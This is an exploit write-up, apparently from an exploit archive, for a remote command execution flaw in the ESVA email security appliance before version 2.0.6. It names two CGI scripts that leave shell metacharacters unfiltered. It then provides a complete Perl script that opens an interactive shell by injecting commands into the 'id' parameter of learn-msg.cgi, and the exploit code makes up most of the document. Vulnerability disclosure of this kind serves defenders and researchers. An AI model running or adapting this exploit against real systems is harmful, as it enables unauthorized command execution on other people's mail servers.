51 lines
No EOL
1.4 KiB
Perl
Executable file
51 lines
No EOL
1.4 KiB
Perl
Executable file
# Exploit Title: E-Mail Security Virtual Appliance (ESVA) Remote Execution.
|
|
# Date: 10 Aug 2012
|
|
# Exploit Author: iJoo
|
|
# Vendor Homepage: http://www.esvacommunity.com/
|
|
# Software Link: http://sourceforge.net/projects/esva-project/
|
|
# Version: < 2.0.6
|
|
|
|
ESVA (E-Mail Security Virtual Appliance) is a pre-built and semi-configured email scanning appliance that will run on VMware Workstation, Server, Player or ESX Server.
|
|
|
|
-=+ Infected Files
|
|
|
|
..../cgi-bin/learn-msg.cgi
|
|
..../cgi-bin/release-msg.cgi
|
|
|
|
Not found any strips/filter to metacharacters..
|
|
Attacker can easily execute command..
|
|
|
|
-=+ Simple RCE ESVA
|
|
|
|
#! /usr/bin/perl
|
|
use LWP;
|
|
use HTTP::Request;
|
|
if (@ARGV < 1)
|
|
{
|
|
print "\n==========================================\n";
|
|
print " ESVA - REMOTE EXECUTION SCRIPT \n";
|
|
print "==========================================\n";
|
|
print "Usage: perl esva.pl host (without http://)\n";
|
|
print "Ex. perl esva.pl www.korban.com\n";
|
|
exit;
|
|
}
|
|
$host=$ARGV[0];
|
|
print "Try to Execution Command!\n";
|
|
print "iDSc-shell# ";
|
|
chomp( $cmd = <STDIN>);
|
|
while($cmd !~ "exit")
|
|
{
|
|
$content = "";
|
|
$ua = LWP::UserAgent->new();
|
|
$ua->agent('');
|
|
$request = HTTP::Request->new (GET => "http://".$host."/cgi-bin/learn-msg.cgi?id=%7c".$cmd."%3b");
|
|
$response = $ua->request ($request);
|
|
$content = $response->content;
|
|
print $content."\n";
|
|
print "iDSc-shell# ";
|
|
chomp( $cmd = <STDIN>);
|
|
}
|
|
|
|
-=+ Thanks to
|
|
My lovely Country NKRI INDONESIA!!
|
|
binh4x staff - www.binushacker.net // Forum.binushacker.net |